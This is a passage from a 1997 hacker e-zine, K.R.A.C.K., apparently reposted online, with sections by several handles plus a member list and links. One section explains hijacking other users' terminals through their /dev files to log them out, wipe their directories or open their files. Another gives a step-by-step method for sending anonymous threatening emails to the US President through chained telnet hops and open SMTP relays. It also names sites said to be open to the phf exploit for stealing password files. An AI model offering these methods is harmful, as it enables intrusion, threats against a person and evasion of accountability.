actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it. These files can be found in the /dev
directory. You can to anything to these files, so long as you
have access -eg you can read them, and write to them, but you
will notice that they never change in size. They are called
character specific files, and are really the link between the
system and the terminals. Whatever you put in these files will
go staright to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
"mesg n" command is issued which turns off write access to that
terminal, BUT- if you can start cating to that terminal before
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.
Check out the terminal, or terminal software being used.
Often you will be able to remotely program another users
terminal, simply by 'cating' a string to a users screen. You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy- (sometimes a
user will walk away without realizing that they are sill
effectively logged on, leaving you with access to their
account!). Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it !
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by "exit"
followed by a carriage return, followed by the transmit screen
code. Using ths technique you can wipe peoples directories or
anything. My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).
End of Section by CarbonBoy
--------------------------------------------------------------------------
I hope this little file is some help to you beginners. Its always nice
to see new new handles on irc and to have people ask questions.
Keep on hackin and don't get caught!!
/////////////////////////*************\\\\\\\\\\\\\\\\\\\\\\\\
| By DEFIANT |
/////////////////////////*************\\\\\\\\\\\\\\\\\\\\\\\\
~~~~Added By Defiant~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Mesin with da president!:
^^^^^^^NOTE FROM THA EDITOR^^^^^^^
This is a pretty touchy subject wich could get you caught fast... we do not
support or recomend using the contents of this file, nor any other files in
this zine... Please Keep That In Mind As You Read This Text.
"NEET TRICKS TO PLAY ON BILL CLINTON"
By: CooL_MoDe (That's mode, not moe "D" you fuckers)
Ok Children. All you anti-political assholes out there should really enjoy this one.
How many of you have ever wondered, "Gee, wouldn't it be fun to do something to the President?"
Well, now you can. I am writting a 3 part article on different things you can do to old BC. Each one has something to do with the H/P/V/A/C world.
Part 1: E-Mail Threats!!!!!
In this litle article I will teach you how to send threatning emails to the President, AND GET AWAY WITH IT!!! In order to do this you MUST know something about sending anonymous email. What you will need:
an anonymous email server
3 shell accounts with any telnetable UNIX system.
the presidents email
(All of these are provided)
Ok, now here we go. In order to save your ass from getting caught you MUST telnet to at least three other sites before telneting to the email server of your choice (prefferably one using an older version of sendmail). So first of all, get out the old telnet client and telnet to where ever you have an account (make sure it is not your account, or you are gonna get busted). Once you connect to the account login, and from there telnet out again to another different account:
ei: telnet myshell.whatever.org
From there do the same thing, telnet out again to the third, and final account.
Once in the third account you must connect to the email server you are going to use to send this mail from. Below is a list(note some of these may have upgrade, and are no longer anonymous, but you should still be pretty safe as long as you telnet to those sites first):
www.zombie.com
mail.sgi.net
mail.westol.com
mail.vcalpha.com
(Note: when connecting to a mail server you MUST connect to port 25)
Ok, now, you are in the third account type:
telnet my.mail.server 25
You will see something like:
220 bla.bla.bla ESMTP Sendmail 8.8.5/8.8.5; Thu, 27 Feb 1997 16:05:39 -05
00 (EST)
You must type
HELO me.com (or wherever ever you want the mail to be comming from)
MAIL FROM: wherever@me.com (or wherever you want the full email address of where you are sending from)
RCPT TO: President@whitehouse.com
DATA
What ever you wish to right
. (Put the . on a line by it's self to stop the message)
Note: you can send multiple messages. Simply by starting the process over again after the . with another MAIL FROM: command. To quit send simply type quit.
PLACE TO GET UNIX SHELLS:
www.csmc.edu
www.dardan.com
www.fxmedi.com
All of the above sites have the phf exploit and the password file can be EASILY aquired.
DON'T GET CAUGHT!
C_M
~~~~Added By Cool_Mode~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Tips From Sygma:
Welcome to The First Issue of The Krack EZine. I, Sygma, will be showing
you some cool trick and hacking. I would also like to say (So I don't get
in Shit), that all the informatino presented on this page is for
educational perposes ONLY... but we all know thats not what your going to
be using it for. Anyways I will be covering in every Issue, IRC
Scripting, Unix, and 95 (Yes 95.. Some Tricks and shit for dummies, cause
some people need it, no Names to be said). If you need back issues and so
on, check www.on-it.net/~sygma/Krack (Which is not up yet cause I need to
make it :)) In all issues there is going to be a little area about stuff
that I write on, my views and so on.
First, my views :). I was reading TIME (Feb 3rd, 1997) and got to
page 53 or so. The article is called INFO PIPLINES. I was looking at the
double page map and looked at the legend. Now would somone explain to me
why we run Coaxial Cables to South America, and some 2.5 Gigabits a sec
lines (Coaxial what were they thinking?). On the Right hand side I was
reading that in Europe/Asia a "SEA-ME-WE 3, operational around 1999,
initially 10 gigabits per sec. Hint: Look at the word SEA then you'll
find out where it runs. Here is a Quote from TIME:
"I'll put a girdle 'round about the earth in 40 minutes,"
declared Puck in A Midsummer Night Dream. Four hundred years after the
play was first produced, the globe is being girdled more thoroughly then
Shakespeare ever dreamed. The transocceanic copper wires that made
communications possible in the presatellite era are being replaced by
arrays of sophisticated fibre optic capable of carrying huge amounts of
data more reliably then the electronic birds circling in the upper
atmosphere. These new data links are the oil piplines of the information
age, the prime conduits for the tech-nological revolution. Where and how
they are built points the way to future change.
The FLAG (FibreOptic Link Around the Globe) project, a $1.5
Billion, 28 000 KM underwater cable snaking its way across the ocean floor
from Britain to Japan, is nearly complete. When finished, it will offer
uninterrupted data traffic between Europe and Asia, traffic that currently
must be routed through the U.S. It is akin to openeing a new navigational
route that will link 75% of the World's Population. It's 5 gigabits of
information per second will allow for a huge increase in electronic
traffic.
Another megaproject that will alter informational trade routes is
the $1.73 Billion SEA-ME-WE 3 cable, approved in January by the 70
countries invloved in its construction. Strtching 38 000 KM, it will by
1999 connect SouthEast Asia, Weestern Europe...."
This Article goes on for quite awhile, but this is the part that
interests me. We get all this lag on irc and all, since not all the
servers run the same line. Dallas for instance is the fastest irc server,
connection wise. Followed by Washington and Vancouver if I can remember
well. Only if all the servers would be running the same speed connection
we would not have as many problems. Think About it.
Now onto the Irc Scripting section. I'm going to start this off
REALLY easy. Like this is so easy you would think that a newborn kid
could do it.
-= Alias =- I have added some Easy to Use aliases.
/i+ /mode # +i
/i- /mode # -i
/n+ /mode # +n
/n- /mode # -n
/m+ /mode # +m
/m- /mode # -m
/t+ /mode # +t
/t- /mode # -t
/s- /mode # -s
/s+ /mode # +s
/p+ /mode # +p
/p- /mode # -p
/k+ /mode # +k $$1
/k- /mode # -k $$1
/v+ /mode # +v $$*
/v- /mode # -v $$*
/l+ /mode # +l $$1
/l- /mode # -l
-= Events =- I will be using a 10 level system.
10. Protect, Ops, and so on... the rest of the levels I'll think
of.. 1 is shitlist tho :) 8 will be just ops.
10:ON JOIN:#:/mode $chan +o $nick
8:ON JOIN:#:/mode $chan +o $nick
ok now see how easy I started? (I'm actually crying now, this is
sooooooo funny) anyways.
-= Popups =-
under Nicknames List add this
User Levels:
.Friend
..Add:/guser 8 $* 3
..Remove:/ruser 1 $*
.Friend (level 10)
..Add:/guser 10 $* 3
..Remove:/ruser 1 $*
.Add User:/auser =6 $*
Ok enough of that Section.. hehehe Ok now for the Unix Section.
This is going to start off from beginner to expert. We get those people
joining #Hackteach asking for help and some how end up getting banned.
AHEM I won't mention nicks. This first one will be basic unix commands
and stuff. Why? Because I'm running out of time to do more. Was on a
ski trip last week.
-=PLEASE NOTE, what I put in CAPS MUST BE in Caps, case sensitive =-
ls - This is the Unix command for 'dir'
mv - move
cp - copy
mkdir - make a directory
ps - check processes
w - show users
finger - uhhh.. better let urself figure this out.
Ok I'm like outta time..cause ti's about 9:
pm right now.. and I need to finish 3 essays for tomorrow.. if u have any
questions or comments, please Email me: Sygma@Pegasus.on-it.net. Also I
don't want to get some bullshit mail.
~~~~Added By Sygma~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
List of members:
Members with a > next to their name donated to this issue... All other
members who dont have that are either on probation... or have a special
arrangement with me.
>DocKool Leader/Programmer/ DocKool@hotmail.com
>NeTDeViL Leader/HTML Editor/Phreak NeTD@hotmail.com
KaMeLeoN Leader/Founder/Grafix Expert Liongrafx@hotmail.com
>Sygma Writer/Scripter Sygma@pegasus.on-it.net
>BlueRain Writer/Programmer pmurgs@aztec.co.za
KidLinux Writer/Programmer infs00ca@frank.mtsu.edu
OoPTiCoO Writer/ ay921@rfgn.epcc.edu
Cyb3rCh|k Writer/ cyb3rchik@worldnet.att.com
DeathLike Writer/ Deathlike@hotmail.com
>Defiant Writer/ Sborosh@skyenet.net
>Dislexic Writer/WebDesign/Security jhanna29@ally.ios.com
>Od^Phreak Writer/Unix Haxor butler@tir.com
Zophar Writer/Phreak zophar@ix.netcom.com
>Cool_Mode Writer/Unix Hacker coolmode@sgi.net
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Closing notes:
Wassup Wassup Wassup, This is NetDevil your Zine Editor. I been away awhile
but were back, and Doc, Kame, and I are bringing Krack back strong. But we
need yer help... if you have anything we can use, from the newest bugs in
popular software to well... anything we can use... please email it to me. A
special thanx go out to all the members... especially those who donated...
it was through your hard work and efforts that the rising of Krack was able
to put this out... thanx again to everyone.
NeTDeViL
P.S. I threw in some helpful links below... chek em out.
www.microsoft.com --- Microsofts home page... includes dnloadable soft.
www.netscape.com --- Netscapes home page... does this software work???
www.yahoo.com --- search engine
www.lycos.com --- search engine
www.webcrawler.com --- search engine
www.altavista.com --- search engine
www.hotmail.com --- free web based email
www.netmanage.co.jp/news/jetmail.htm --- free web based email
www.geocities.com --- free web space for web pages
www.angelfire.com --- free web space for web pages
www.mirc.co.uk --- mIRCs downloadble software
www.tucows.com --- free utilities
---------------------------------------------------------------------------

---------------------------------------------------------------------------
This Has Been a K.R.A.C.K. production. Thank you for Choosing K.R.A.C.K
Killer Ride And Chillin Kraftwork
Also With
10010011 1000110 10010001 10101001 10101001
CyBrids CSE The Taste of a new Genre ;)
10101001 1010101 11010010 10101010 10101010
Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment